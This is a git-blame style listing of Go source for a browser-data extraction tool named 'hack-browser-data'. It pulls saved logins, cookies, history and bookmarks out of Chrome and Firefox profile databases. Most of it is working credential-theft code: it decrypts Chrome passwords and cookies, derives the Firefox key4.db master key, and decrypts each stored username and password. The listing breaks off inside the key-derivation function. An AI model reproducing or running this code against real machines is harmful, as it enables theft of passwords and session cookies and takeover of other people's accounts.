2020-06-25 20:33:23 +00:00
|
|
|
package core
|
2020-06-19 12:43:31 +00:00
|
|
|
|
|
|
|
import (
|
2020-07-06 07:19:11 +00:00
|
|
|
"bytes"
|
|
|
|
"crypto/cipher"
|
|
|
|
"crypto/des"
|
|
|
|
"crypto/hmac"
|
|
|
|
"crypto/sha1"
|
2020-06-19 12:43:31 +00:00
|
|
|
"database/sql"
|
2020-07-06 07:19:11 +00:00
|
|
|
"encoding/asn1"
|
|
|
|
"encoding/base64"
|
|
|
|
"encoding/hex"
|
2020-06-19 12:43:31 +00:00
|
|
|
"hack-browser-data/log"
|
|
|
|
"hack-browser-data/utils"
|
2020-07-07 12:27:14 +00:00
|
|
|
"io"
|
2020-07-06 07:19:11 +00:00
|
|
|
"io/ioutil"
|
2020-06-23 10:30:00 +00:00
|
|
|
"os"
|
2020-06-22 09:23:18 +00:00
|
|
|
"time"
|
2020-06-19 12:43:31 +00:00
|
|
|
|
|
|
|
_ "github.com/mattn/go-sqlite3"
|
2020-06-22 09:23:18 +00:00
|
|
|
"github.com/tidwall/gjson"
|
2020-06-19 12:43:31 +00:00
|
|
|
)
|
|
|
|
|
2020-06-22 09:23:18 +00:00
|
|
|
const (
|
|
|
|
bookmarkID = "id"
|
|
|
|
bookmarkAdded = "date_added"
|
|
|
|
bookmarkUrl = "url"
|
|
|
|
bookmarkName = "name"
|
|
|
|
bookmarkType = "type"
|
|
|
|
bookmarkChildren = "children"
|
|
|
|
)
|
|
|
|
|
2020-06-25 20:33:23 +00:00
|
|
|
var (
|
2020-06-30 04:01:00 +00:00
|
|
|
FullData = new(BrowserData)
|
2020-06-25 20:33:23 +00:00
|
|
|
)
|
|
|
|
|
2020-06-19 12:43:31 +00:00
|
|
|
type (
|
|
|
|
BrowserData struct {
|
2020-06-25 20:33:23 +00:00
|
|
|
LoginDataSlice
|
|
|
|
BookmarkSlice
|
|
|
|
CookieMap
|
|
|
|
HistorySlice
|
2020-06-19 12:43:31 +00:00
|
|
|
}
|
2020-06-25 20:33:23 +00:00
|
|
|
LoginDataSlice []loginData
|
|
|
|
BookmarkSlice []bookmarks
|
|
|
|
CookieMap map[string][]cookies
|
|
|
|
HistorySlice []history
|
|
|
|
loginData struct {
|
2020-06-25 09:37:18 +00:00
|
|
|
UserName string
|
2020-06-25 20:33:23 +00:00
|
|
|
encryptPass []byte
|
2020-07-06 08:13:25 +00:00
|
|
|
encryptUser []byte
|
2020-06-25 09:37:18 +00:00
|
|
|
Password string
|
|
|
|
LoginUrl string
|
|
|
|
CreateDate time.Time
|
2020-06-19 12:43:31 +00:00
|
|
|
}
|
2020-06-25 20:33:23 +00:00
|
|
|
bookmarks struct {
|
|
|
|
ID int64
|
2020-06-25 09:37:18 +00:00
|
|
|
Name string
|
|
|
|
Type string
|
2020-06-30 04:01:00 +00:00
|
|
|
URL string
|
|
|
|
DateAdded time.Time
|
2020-06-19 12:43:31 +00:00
|
|
|
}
|
2020-06-25 20:33:23 +00:00
|
|
|
cookies struct {
|
2020-06-30 04:01:00 +00:00
|
|
|
Host string
|
|
|
|
Path string
|
2020-06-22 10:34:41 +00:00
|
|
|
KeyName string
|
|
|
|
encryptValue []byte
|
|
|
|
Value string
|
|
|
|
IsSecure bool
|
|
|
|
IsHTTPOnly bool
|
|
|
|
HasExpire bool
|
|
|
|
IsPersistent bool
|
|
|
|
CreateDate time.Time
|
|
|
|
ExpireDate time.Time
|
2020-06-19 12:43:31 +00:00
|
|
|
}
|
2020-06-25 20:33:23 +00:00
|
|
|
history struct {
|
2020-06-23 02:42:10 +00:00
|
|
|
Title string
|
2020-06-30 04:01:00 +00:00
|
|
|
Url string
|
2020-06-23 02:42:10 +00:00
|
|
|
VisitCount int
|
|
|
|
LastVisitTime time.Time
|
2020-06-19 12:43:31 +00:00
|
|
|
}
|
|
|
|
)
|
|
|
|
|
2020-06-28 09:18:02 +00:00
|
|
|
func ParseResult(dbname string) {
|
2020-06-22 09:23:18 +00:00
|
|
|
switch dbname {
|
|
|
|
case utils.Bookmarks:
|
|
|
|
parseBookmarks()
|
2020-06-23 02:42:10 +00:00
|
|
|
case utils.History:
|
|
|
|
parseHistory()
|
2020-06-28 09:18:02 +00:00
|
|
|
case utils.Cookies:
|
|
|
|
parseCookie()
|
|
|
|
case utils.LoginData:
|
|
|
|
parseLogin()
|
2020-07-06 08:13:25 +00:00
|
|
|
case utils.FirefoxCookie:
|
|
|
|
parseFirefoxCookie()
|
2020-07-07 12:27:14 +00:00
|
|
|
case utils.FirefoxKey4DB:
|
|
|
|
parseFirefoxKey4()
|
|
|
|
case utils.FirefoxData:
|
|
|
|
parseFirefoxData()
|
2020-06-22 09:23:18 +00:00
|
|
|
}
|
|
|
|
}
|
|
|
|
|
2020-06-25 20:33:23 +00:00
|
|
|
var bookmarkList BookmarkSlice
|
|
|
|
|
2020-06-22 09:23:18 +00:00
|
|
|
func parseBookmarks() {
|
|
|
|
bookmarks, err := utils.ReadFile(utils.Bookmarks)
|
2020-06-25 20:33:23 +00:00
|
|
|
defer os.Remove(utils.Bookmarks)
|
2020-06-22 09:23:18 +00:00
|
|
|
if err != nil {
|
|
|
|
log.Println(err)
|
|
|
|
}
|
|
|
|
r := gjson.Parse(bookmarks)
|
|
|
|
if r.Exists() {
|
|
|
|
roots := r.Get("roots")
|
|
|
|
roots.ForEach(func(key, value gjson.Result) bool {
|
2020-06-22 10:34:41 +00:00
|
|
|
getBookmarkChildren(value)
|
2020-06-22 09:23:18 +00:00
|
|
|
return true
|
|
|
|
})
|
|
|
|
}
|
2020-06-25 20:33:23 +00:00
|
|
|
FullData.BookmarkSlice = bookmarkList
|
2020-06-22 09:23:18 +00:00
|
|
|
}
|
|
|
|
|
2020-06-22 10:34:41 +00:00
|
|
|
var queryLogin = `SELECT origin_url, username_value, password_value, date_created FROM logins`
|
2020-06-22 09:23:18 +00:00
|
|
|
|
2020-06-23 02:42:10 +00:00
|
|
|
func parseLogin() {
|
2020-06-25 20:33:23 +00:00
|
|
|
var loginItemList LoginDataSlice
|
|
|
|
login := loginData{}
|
2020-06-22 10:34:41 +00:00
|
|
|
loginDB, err := sql.Open("sqlite3", utils.LoginData)
|
2020-06-25 20:33:23 +00:00
|
|
|
defer os.Remove(utils.LoginData)
|
2020-06-19 12:43:31 +00:00
|
|
|
defer func() {
|
2020-06-22 10:34:41 +00:00
|
|
|
if err := loginDB.Close(); err != nil {
|
2020-06-19 12:43:31 +00:00
|
|
|
log.Println(err)
|
|
|
|
}
|
|
|
|
}()
|
|
|
|
if err != nil {
|
|
|
|
log.Println(err)
|
|
|
|
}
|
2020-06-22 10:34:41 +00:00
|
|
|
err = loginDB.Ping()
|
|
|
|
rows, err := loginDB.Query(queryLogin)
|
2020-06-19 12:43:31 +00:00
|
|
|
defer func() {
|
|
|
|
if err := rows.Close(); err != nil {
|
|
|
|
log.Println(err)
|
|
|
|
}
|
|
|
|
}()
|
|
|
|
for rows.Next() {
|
|
|
|
var (
|
2020-06-22 10:34:41 +00:00
|
|
|
url, username, password string
|
|
|
|
pwd []byte
|
|
|
|
create int64
|
2020-06-19 12:43:31 +00:00
|
|
|
)
|
2020-06-22 09:23:18 +00:00
|
|
|
err = rows.Scan(&url, &username, &pwd, &create)
|
2020-06-25 20:33:23 +00:00
|
|
|
login = loginData{
|
2020-06-19 12:43:31 +00:00
|
|
|
UserName: username,
|
2020-06-25 20:33:23 +00:00
|
|
|
encryptPass: pwd,
|
2020-06-19 12:43:31 +00:00
|
|
|
LoginUrl: url,
|
|
|
|
}
|
2020-06-28 09:18:02 +00:00
|
|
|
if utils.VersionUnder80 {
|
|
|
|
password, err = utils.DecryptStringWithDPAPI(pwd)
|
|
|
|
} else {
|
|
|
|
password, err = utils.DecryptChromePass(pwd)
|
|
|
|
}
|
|
|
|
if create > time.Now().Unix() {
|
|
|
|
login.CreateDate = utils.TimeEpochFormat(create)
|
|
|
|
} else {
|
|
|
|
login.CreateDate = utils.TimeStampFormat(create)
|
|
|
|
}
|
|
|
|
|
2020-06-22 10:34:41 +00:00
|
|
|
login.Password = password
|
2020-06-19 12:43:31 +00:00
|
|
|
if err != nil {
|
|
|
|
log.Println(err)
|
|
|
|
}
|
2020-06-23 02:42:10 +00:00
|
|
|
loginItemList = append(loginItemList, login)
|
2020-06-19 12:43:31 +00:00
|
|
|
}
|
2020-06-25 20:33:23 +00:00
|
|
|
FullData.LoginDataSlice = loginItemList
|
2020-06-19 12:43:31 +00:00
|
|
|
}
|
2020-06-22 09:23:18 +00:00
|
|
|
|
2020-06-22 10:34:41 +00:00
|
|
|
var queryCookie = `SELECT name, encrypted_value, host_key, path, creation_utc, expires_utc, is_secure, is_httponly, has_expires, is_persistent FROM cookies`
|
2020-06-23 02:42:10 +00:00
|
|
|
|
|
|
|
func parseCookie() {
|
2020-06-25 20:33:23 +00:00
|
|
|
cookie := cookies{}
|
|
|
|
cookieMap := make(map[string][]cookies)
|
2020-06-22 10:34:41 +00:00
|
|
|
cookieDB, err := sql.Open("sqlite3", utils.Cookies)
|
2020-06-25 20:33:23 +00:00
|
|
|
defer os.Remove(utils.Cookies)
|
2020-06-22 10:34:41 +00:00
|
|
|
defer func() {
|
|
|
|
if err := cookieDB.Close(); err != nil {
|
|
|
|
log.Println(err)
|
|
|
|
}
|
|
|
|
}()
|
|
|
|
if err != nil {
|
|
|
|
log.Println(err)
|
|
|
|
}
|
|
|
|
err = cookieDB.Ping()
|
|
|
|
rows, err := cookieDB.Query(queryCookie)
|
|
|
|
defer func() {
|
|
|
|
if err := rows.Close(); err != nil {
|
|
|
|
log.Println(err)
|
|
|
|
}
|
|
|
|
}()
|
|
|
|
for rows.Next() {
|
|
|
|
var (
|
|
|
|
key, host, path, value string
|
2020-06-23 02:42:10 +00:00
|
|
|
isSecure, isHTTPOnly, hasExpire, isPersistent int
|
2020-06-22 10:34:41 +00:00
|
|
|
createDate, expireDate int64
|
|
|
|
encryptValue []byte
|
|
|
|
)
|
|
|
|
err = rows.Scan(&key, &encryptValue, &host, &path, &createDate, &expireDate, &isSecure, &isHTTPOnly, &hasExpire, &isPersistent)
|
2020-06-25 20:33:23 +00:00
|
|
|
cookie = cookies{
|
2020-06-22 10:34:41 +00:00
|
|
|
KeyName: key,
|
|
|
|
Host: host,
|
|
|
|
Path: path,
|
|
|
|
encryptValue: encryptValue,
|
2020-06-23 02:42:10 +00:00
|
|
|
IsSecure: utils.IntToBool(isSecure),
|
|
|
|
IsHTTPOnly: utils.IntToBool(isHTTPOnly),
|
|
|
|
HasExpire: utils.IntToBool(hasExpire),
|
|
|
|
IsPersistent: utils.IntToBool(isPersistent),
|
2020-06-22 10:34:41 +00:00
|
|
|
CreateDate: utils.TimeEpochFormat(createDate),
|
|
|
|
ExpireDate: utils.TimeEpochFormat(expireDate),
|
|
|
|
}
|
2020-06-25 09:37:18 +00:00
|
|
|
// remove prefix 'v10'
|
2020-06-28 09:18:02 +00:00
|
|
|
if utils.VersionUnder80 {
|
|
|
|
value, err = utils.DecryptStringWithDPAPI(encryptValue)
|
|
|
|
} else {
|
|
|
|
value, err = utils.DecryptChromePass(encryptValue)
|
|
|
|
}
|
|
|
|
|
2020-06-25 20:33:23 +00:00
|
|
|
cookie.Value = value
|
|
|
|
if _, ok := cookieMap[host]; ok {
|
|
|
|
cookieMap[host] = append(cookieMap[host], cookie)
|
|
|
|
} else {
|
|
|
|
cookieMap[host] = []cookies{cookie}
|
|
|
|
}
|
2020-06-22 10:34:41 +00:00
|
|
|
}
|
2020-06-25 20:33:23 +00:00
|
|
|
FullData.CookieMap = cookieMap
|
2020-06-22 10:34:41 +00:00
|
|
|
}
|
|
|
|
|
2020-06-23 10:30:00 +00:00
|
|
|
var queryHistory = `SELECT url, title, visit_count, last_visit_time FROM urls`
|
2020-06-22 09:23:18 +00:00
|
|
|
|
2020-06-23 02:42:10 +00:00
|
|
|
func parseHistory() {
|
2020-06-25 20:33:23 +00:00
|
|
|
var historyList HistorySlice
|
|
|
|
h := history{}
|
2020-06-23 02:42:10 +00:00
|
|
|
historyDB, err := sql.Open("sqlite3", utils.History)
|
2020-06-25 20:33:23 +00:00
|
|
|
defer os.Remove(utils.History)
|
2020-06-23 02:42:10 +00:00
|
|
|
defer func() {
|
|
|
|
if err := historyDB.Close(); err != nil {
|
|
|
|
log.Println(err)
|
|
|
|
}
|
|
|
|
}()
|
|
|
|
if err != nil {
|
|
|
|
log.Println(err)
|
|
|
|
}
|
|
|
|
err = historyDB.Ping()
|
2020-06-23 10:30:00 +00:00
|
|
|
rows, err := historyDB.Query(queryHistory)
|
2020-06-23 02:42:10 +00:00
|
|
|
defer func() {
|
|
|
|
if err := rows.Close(); err != nil {
|
|
|
|
log.Println(err)
|
|
|
|
}
|
|
|
|
}()
|
|
|
|
for rows.Next() {
|
|
|
|
var (
|
|
|
|
url, title string
|
|
|
|
visitCount int
|
|
|
|
lastVisitTime int64
|
|
|
|
)
|
|
|
|
err := rows.Scan(&url, &title, &visitCount, &lastVisitTime)
|
2020-06-25 20:33:23 +00:00
|
|
|
h = history{
|
2020-06-23 02:42:10 +00:00
|
|
|
Url: url,
|
|
|
|
Title: title,
|
|
|
|
VisitCount: visitCount,
|
|
|
|
LastVisitTime: utils.TimeEpochFormat(lastVisitTime),
|
|
|
|
}
|
|
|
|
if err != nil {
|
|
|
|
log.Println(err)
|
|
|
|
continue
|
|
|
|
}
|
2020-06-25 20:33:23 +00:00
|
|
|
historyList = append(historyList, h)
|
2020-06-23 02:42:10 +00:00
|
|
|
}
|
2020-06-25 20:33:23 +00:00
|
|
|
FullData.HistorySlice = historyList
|
2020-06-22 09:23:18 +00:00
|
|
|
}
|
|
|
|
|
2020-06-22 10:34:41 +00:00
|
|
|
func getBookmarkChildren(value gjson.Result) (children gjson.Result) {
|
2020-06-25 20:33:23 +00:00
|
|
|
b := bookmarks{}
|
|
|
|
b.ID = value.Get(bookmarkID).Int()
|
2020-06-22 10:34:41 +00:00
|
|
|
nodeType := value.Get(bookmarkType)
|
|
|
|
b.DateAdded = utils.TimeEpochFormat(value.Get(bookmarkAdded).Int())
|
|
|
|
b.URL = value.Get(bookmarkUrl).String()
|
|
|
|
b.Name = value.Get(bookmarkName).String()
|
|
|
|
children = value.Get(bookmarkChildren)
|
|
|
|
if nodeType.Exists() {
|
|
|
|
b.Type = nodeType.String()
|
|
|
|
bookmarkList = append(bookmarkList, b)
|
|
|
|
if children.Exists() && children.IsArray() {
|
|
|
|
for _, v := range children.Array() {
|
|
|
|
children = getBookmarkChildren(v)
|
|
|
|
}
|
|
|
|
}
|
|
|
|
}
|
|
|
|
return children
|
2020-06-22 09:23:18 +00:00
|
|
|
}
|
2020-07-06 07:19:11 +00:00
|
|
|
|
2020-07-07 12:27:14 +00:00
|
|
|
var queryFirefoxBookMarks = `SELECT id, fk, type, dateAdded, title FROM moz_bookmarks`
|
|
|
|
var queryFirefoxHistory = `SELECT id, url, title, last_visit_date, visit_count FROM moz_places`
|
|
|
|
|
|
|
|
// places.sqlite doc @https://developer.mozilla.org/en-US/docs/Mozilla/Tech/Places/Database
|
|
|
|
func parseFirefoxData() {
|
|
|
|
var historyList HistorySlice
|
|
|
|
var (
|
2020-07-07 13:27:50 +00:00
|
|
|
err error
|
|
|
|
keyDB *sql.DB
|
|
|
|
bookmarkRows, historyRows *sql.Rows
|
|
|
|
tempMap map[int64]string
|
|
|
|
bookmarkUrl string
|
2020-07-07 12:27:14 +00:00
|
|
|
)
|
|
|
|
tempMap = make(map[int64]string)
|
|
|
|
keyDB, err = sql.Open("sqlite3", utils.FirefoxData)
|
|
|
|
defer os.Remove(utils.FirefoxData)
|
|
|
|
defer func() {
|
|
|
|
err := keyDB.Close()
|
|
|
|
if err != nil {
|
|
|
|
log.Error(err)
|
|
|
|
}
|
|
|
|
}()
|
|
|
|
if err != nil {
|
|
|
|
log.Error(err)
|
|
|
|
}
|
2020-07-07 13:27:50 +00:00
|
|
|
historyRows, err = keyDB.Query(queryFirefoxHistory)
|
2020-07-07 12:27:14 +00:00
|
|
|
if err != nil {
|
|
|
|
log.Error(err)
|
|
|
|
}
|
2020-07-07 13:27:50 +00:00
|
|
|
|
2020-07-07 12:27:14 +00:00
|
|
|
defer func() {
|
2020-07-07 13:27:50 +00:00
|
|
|
if err := historyRows.Close(); err != nil {
|
2020-07-07 12:27:14 +00:00
|
|
|
log.Error(err)
|
|
|
|
}
|
|
|
|
}()
|
2020-07-07 13:27:50 +00:00
|
|
|
for historyRows.Next() {
|
2020-07-07 12:27:14 +00:00
|
|
|
var (
|
|
|
|
id, visitDate int64
|
|
|
|
url, title string
|
|
|
|
visitCount int
|
|
|
|
)
|
2020-07-07 13:27:50 +00:00
|
|
|
err = historyRows.Scan(&id, &url, &title, &visitDate, &visitCount)
|
2020-07-07 12:27:14 +00:00
|
|
|
historyList = append(historyList, history{
|
|
|
|
Title: title,
|
|
|
|
Url: url,
|
|
|
|
VisitCount: visitCount,
|
2020-07-07 13:27:50 +00:00
|
|
|
LastVisitTime: utils.TimeStampFormat(visitDate / 1000000),
|
2020-07-07 12:27:14 +00:00
|
|
|
})
|
|
|
|
tempMap[id] = url
|
|
|
|
}
|
|
|
|
FullData.HistorySlice = historyList
|
|
|
|
|
2020-07-07 13:27:50 +00:00
|
|
|
bookmarkRows, err = keyDB.Query(queryFirefoxBookMarks)
|
|
|
|
defer func() {
|
|
|
|
if err := bookmarkRows.Close(); err != nil {
|
|
|
|
log.Error(err)
|
|
|
|
}
|
|
|
|
}()
|
2020-07-07 12:27:14 +00:00
|
|
|
for bookmarkRows.Next() {
|
|
|
|
var (
|
|
|
|
id, fk, bType, dateAdded int64
|
|
|
|
title string
|
|
|
|
)
|
|
|
|
err = bookmarkRows.Scan(&id, &fk, &bType, &dateAdded, &title)
|
|
|
|
if url, ok := tempMap[id]; ok {
|
|
|
|
bookmarkUrl = url
|
|
|
|
}
|
|
|
|
bookmarkList = append(bookmarkList, bookmarks{
|
|
|
|
ID: id,
|
|
|
|
Name: title,
|
|
|
|
Type: utils.BookMarkType(bType),
|
|
|
|
URL: bookmarkUrl,
|
|
|
|
DateAdded: utils.TimeStampFormat(dateAdded / 1000000),
|
|
|
|
})
|
|
|
|
}
|
|
|
|
FullData.BookmarkSlice = bookmarkList
|
|
|
|
}
|
|
|
|
|
2020-07-06 07:19:11 +00:00
|
|
|
var queryPassword = `SELECT item1, item2 FROM metaData WHERE id = 'password'`
|
|
|
|
|
2020-07-07 12:27:14 +00:00
|
|
|
func checkKey1() (b [][]byte) {
|
|
|
|
var (
|
|
|
|
err error
|
|
|
|
keyDB *sql.DB
|
|
|
|
rows *sql.Rows
|
|
|
|
)
|
|
|
|
|
|
|
|
keyDB, err = sql.Open("sqlite3", utils.FirefoxKey4DB)
|
2020-07-06 07:19:11 +00:00
|
|
|
defer func() {
|
|
|
|
if err := keyDB.Close(); err != nil {
|
2020-07-07 12:27:14 +00:00
|
|
|
log.Error(err)
|
2020-07-06 07:19:11 +00:00
|
|
|
}
|
|
|
|
}()
|
2020-07-07 12:27:14 +00:00
|
|
|
|
2020-07-06 07:19:11 +00:00
|
|
|
if err != nil {
|
|
|
|
log.Println(err)
|
|
|
|
}
|
|
|
|
err = keyDB.Ping()
|
2020-07-07 12:27:14 +00:00
|
|
|
rows, err = keyDB.Query(queryPassword)
|
2020-07-06 07:19:11 +00:00
|
|
|
defer func() {
|
|
|
|
if err := rows.Close(); err != nil {
|
|
|
|
log.Println(err)
|
|
|
|
}
|
|
|
|
}()
|
|
|
|
for rows.Next() {
|
|
|
|
var (
|
|
|
|
item1, item2 []byte
|
|
|
|
)
|
|
|
|
if err := rows.Scan(&item1, &item2); err != nil {
|
2020-07-07 12:27:14 +00:00
|
|
|
log.Error(err)
|
|
|
|
continue
|
2020-07-06 07:19:11 +00:00
|
|
|
}
|
|
|
|
b = append(b, item1, item2)
|
|
|
|
}
|
|
|
|
return b
|
|
|
|
}
|
|
|
|
|
2020-07-07 12:27:14 +00:00
|
|
|
var queryNssPrivate = `SELECT a11, a102 from nssPrivate;`
|
|
|
|
|
|
|
|
func checkA102() (b [][]byte) {
|
|
|
|
keyDB, err := sql.Open("sqlite3", utils.FirefoxKey4DB)
|
2020-07-06 07:19:11 +00:00
|
|
|
|
|
|
|
defer func() {
|
2020-07-07 12:27:14 +00:00
|
|
|
if err := os.Remove(utils.FirefoxKey4DB); err != nil {
|
|
|
|
log.Error(err)
|
2020-07-06 07:19:11 +00:00
|
|
|
}
|
|
|
|
}()
|
2020-07-07 12:27:14 +00:00
|
|
|
defer func(closer io.Closer) {
|
|
|
|
if err := keyDB.Close(); err != nil {
|
|
|
|
log.Error(err)
|
|
|
|
}
|
|
|
|
}(keyDB)
|
|
|
|
|
2020-07-06 07:19:11 +00:00
|
|
|
if err != nil {
|
2020-07-07 12:27:14 +00:00
|
|
|
log.Error(err)
|
2020-07-06 07:19:11 +00:00
|
|
|
}
|
2020-07-07 12:27:14 +00:00
|
|
|
rows, err := keyDB.Query(queryNssPrivate)
|
2020-07-06 07:19:11 +00:00
|
|
|
defer func() {
|
|
|
|
if err := rows.Close(); err != nil {
|
|
|
|
log.Println(err)
|
|
|
|
}
|
|
|
|
}()
|
|
|
|
for rows.Next() {
|
|
|
|
var (
|
|
|
|
a11, a102 []byte
|
|
|
|
)
|
|
|
|
if err := rows.Scan(&a11, &a102); err != nil {
|
|
|
|
log.Println(err)
|
|
|
|
}
|
|
|
|
b = append(b, a11, a102)
|
|
|
|
}
|
|
|
|
return b
|
|
|
|
}
|
|
|
|
|
|
|
|
/*
|
|
|
|
ASN1 PBE Structures
|
|
|
|
SEQUENCE (2 elem)
|
|
|
|
SEQUENCE (2 elem)
|
|
|
|
OBJECT IDENTIFIER
|
|
|
|
SEQUENCE (2 elem)
|
|
|
|
OCTET STRING (20 byte)
|
|
|
|
INTEGER 1
|
|
|
|
OCTET STRING (16 byte)
|
|
|
|
*/
|
|
|
|
|
|
|
|
type PBEAlgorithms struct {
|
|
|
|
SequenceA
|
|
|
|
CipherText []byte
|
|
|
|
}
|
|
|
|
|
|
|
|
type SequenceA struct {
|
|
|
|
DecryptMethod asn1.ObjectIdentifier
|
|
|
|
SequenceB
|
|
|
|
}
|
|
|
|
|
|
|
|
type SequenceB struct {
|
|
|
|
EntrySalt []byte
|
|
|
|
Len int
|
|
|
|
}
|
|
|
|
|
|
|
|
/*
|
|
|
|
SEQUENCE (3 elem)
|
|
|
|
OCTET STRING (16 byte)
|
|
|
|
SEQUENCE (2 elem)
|
|
|
|
OBJECT IDENTIFIER 1.2.840.113549.3.7 des-EDE3-CBC (RSADSI encryptionAlgorithm)
|
|
|
|
OCTET STRING (8 byte)
|
|
|
|
OCTET STRING (16 byte)
|
|
|
|
*/
|
|
|
|
type PasswordAsn1 struct {
|
|
|
|
CipherText []byte
|
|
|
|
SequenceIV
|
|
|
|
Encrypted []byte
|
|
|
|
}
|
|
|
|
|
|
|
|
type SequenceIV struct {
|
|
|
|
asn1.ObjectIdentifier
|
|
|
|
Iv []byte
|
|
|
|
}
|
|
|
|
|
|
|
|
func decryptPBE(decodeItem []byte) (pbe PBEAlgorithms) {
|
|
|
|
_, err := asn1.Unmarshal(decodeItem, &pbe)
|
|
|
|
if err != nil {
|
|
|
|
log.Error(err)
|
|
|
|
}
|
|
|
|
return
|
|
|
|
}
|
|
|
|
|
2020-07-07 12:27:14 +00:00
|
|
|
func parseFirefoxKey4() {
|
|
|
|
h1 := checkKey1()
|
2020-07-06 07:19:11 +00:00
|
|
|
globalSalt := h1[0]
|
|
|
|
decodedItem := h1[1]
|
|
|
|
keyLin := []byte{248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1}
|
|
|
|
pbe := decryptPBE(decodedItem)
|
|
|
|
m := checkPassword(globalSalt, pbe.EntrySalt, pbe.CipherText)
|
|
|
|
var finallyKey []byte
|
|
|
|
if bytes.Contains(m, []byte("password-check")) {
|
|
|
|
log.Println("password-check success")
|
2020-07-07 12:27:14 +00:00
|
|
|
h2 := checkA102()
|
2020-07-06 07:19:11 +00:00
|
|
|
a11 := h2[0]
|
|
|
|
a102 := h2[1]
|
|
|
|
m := bytes.Compare(a102, keyLin)
|
|
|
|
if m == 0 {
|
|
|
|
pbe2 := decryptPBE(a11)
|
|
|
|
log.Debugf("decrypt asn1 pbe success")
|
|
|
|
finallyKey = checkPassword(globalSalt, pbe2.EntrySalt, pbe2.CipherText)[:24]
|
|
|
|
log.Debugf("finally key", finallyKey, hex.EncodeToString(finallyKey))
|
|
|
|
}
|
|
|
|
}
|
2020-07-07 12:27:14 +00:00
|
|
|
allLogins := GetLoginData()
|
2020-07-06 07:19:11 +00:00
|
|
|
for _, v := range allLogins {
|
|
|
|
log.Warn(hex.EncodeToString(v.encryptUser))
|
|
|
|
s1 := decryptLogin(v.encryptUser)
|
|
|
|
log.Warn(hex.EncodeToString(v.encryptPass))
|
|
|
|
s2 := decryptLogin(v.encryptPass)
|
|
|
|
log.Println(s1, s1.CipherText, s1.Encrypted, s1.Iv)
|
|
|
|
block, err := des.NewTripleDESCipher(finallyKey)
|
|
|
|
if err != nil {
|
|
|
|
log.Println(err)
|
|
|
|
}
|
|
|
|
blockMode := cipher.NewCBCDecrypter(block, s1.Iv)
|
|
|
|
sq := make([]byte, len(s1.Encrypted))
|
|
|
|
blockMode.CryptBlocks(sq, s1.Encrypted)
|
|
|
|
blockMode2 := cipher.NewCBCDecrypter(block, s2.Iv)
|
|
|
|
sq2 := make([]byte, len(s2.Encrypted))
|
|
|
|
blockMode2.CryptBlocks(sq2, s2.Encrypted)
|
2020-07-06 07:33:40 +00:00
|
|
|
FullData.LoginDataSlice = append(FullData.LoginDataSlice, loginData{
|
2020-07-06 08:13:25 +00:00
|
|
|
LoginUrl: v.LoginUrl,
|
2020-07-07 13:27:50 +00:00
|
|
|
UserName: string(utils.PKCS5UnPadding(sq)),
|
|
|
|
Password: string(utils.PKCS5UnPadding(sq2)),
|
2020-07-06 08:13:25 +00:00
|
|
|
CreateDate: v.CreateDate,
|
2020-07-06 07:33:40 +00:00
|
|
|
})
|
2020-07-06 07:19:11 +00:00
|
|
|
}
|
|
|
|
}
|
|
|
|
|
2020-07-06 08:13:25 +00:00
|
|
|
var queryFirefoxCookie = `SELECT name, value, host, path, creationTime, expiry, isSecure, isHttpOnly FROM moz_cookies`
|
|
|
|
|
|
|
|
func parseFirefoxCookie() {
|
|
|
|
cookie := cookies{}
|
|
|
|
cookieMap := make(map[string][]cookies)
|
|
|
|
cookieDB, err := sql.Open("sqlite3", utils.FirefoxCookie)
|
|
|
|
defer os.Remove(utils.FirefoxCookie)
|
|
|
|
defer func() {
|
|
|
|
if err := cookieDB.Close(); err != nil {
|
|
|
|
log.Println(err)
|
|
|
|
}
|
|
|
|
}()
|
|
|
|
if err != nil {
|
|
|
|
log.Println(err)
|
|
|
|
}
|
|
|
|
err = cookieDB.Ping()
|
|
|
|
rows, err := cookieDB.Query(queryFirefoxCookie)
|
|
|
|
defer func() {
|
|
|
|
if err := rows.Close(); err != nil {
|
|
|
|
log.Println(err)
|
|
|
|
}
|
|
|
|
}()
|
|
|
|
for rows.Next() {
|
|
|
|
var (
|
|
|
|
name, value, host, path string
|
|
|
|
isSecure, isHttpOnly int
|
|
|
|
creationTime, expiry int64
|
|
|
|
)
|
|
|
|
err = rows.Scan(&name, &value, &host, &path, &creationTime, &expiry, &isSecure, &isHttpOnly)
|
|
|
|
cookie = cookies{
|
|
|
|
KeyName: name,
|
|
|
|
Host: host,
|
|
|
|
Path: path,
|
|
|
|
IsSecure: utils.IntToBool(isSecure),
|
|
|
|
IsHTTPOnly: utils.IntToBool(isHttpOnly),
|
|
|
|
CreateDate: utils.TimeStampFormat(creationTime / 1000000),
|
|
|
|
ExpireDate: utils.TimeStampFormat(expiry),
|
|
|
|
}
|
|
|
|
|
|
|
|
cookie.Value = value
|
|
|
|
if _, ok := cookieMap[host]; ok {
|
|
|
|
cookieMap[host] = append(cookieMap[host], cookie)
|
|
|
|
} else {
|
|
|
|
cookieMap[host] = []cookies{cookie}
|
|
|
|
}
|
|
|
|
}
|
|
|
|
FullData.CookieMap = cookieMap
|
|
|
|
|
|
|
|
}
|
|
|
|
|
2020-07-06 07:19:11 +00:00
|
|
|
func checkPassword(globalSalt, entrySalt, encryptText []byte) []byte {
|
|
|
|
//byte[] GLMP; // GlobalSalt + MasterPassword
|
|
|
|
//byte[] HP; // SHA1(GLMP)
|
|
|
|
//byte[] HPES; // HP + EntrySalt
|
|
|
|
//byte[] CHP; // SHA1(HPES)
|
|
|
|
//byte[] PES; // EntrySalt completed to 20 bytes by zero
|
|
|
|
//byte[] PESES; // PES + EntrySalt
|
|
|
|
//byte[] k1;
|
|
|
|
//byte[] tk;
|
|
|
|
//byte[] k2;
|
|
|
|
//byte[] k; // final value conytaining key and iv
|
|
|
|
sha1.New()
|
|
|
|
hp := sha1.Sum(globalSalt)
|
|
|
|
log.Warn(hex.EncodeToString(hp[:]))
|
|
|
|
log.Println(len(entrySalt))
|
|
|
|
s := append(hp[:], entrySalt...)
|
|
|
|
log.Warn(hex.EncodeToString(s))
|
|
|
|
chp := sha1.Sum(s)
|
|
|
|
log.Warn(hex.EncodeToString(chp[:]))
|
|
|
|
pes := paddingZero(entrySalt, 20)
|
|
|
|
tk := hmac.New(sha1.New, chp[:])
|
|
|
|
tk.Write(pes)
|
|
|
|
pes = append(pes, entrySalt...)
|
|
|
|
log.Warn(hex.EncodeToString(pes))
|
|
|
|
k1 := hmac.New(sha1.New, chp[:])
|
|
|
|
k1.Write(pes)
|
|
|
|
log.Warn(hex.EncodeToString(k1.Sum(nil)))
|
|
|
|
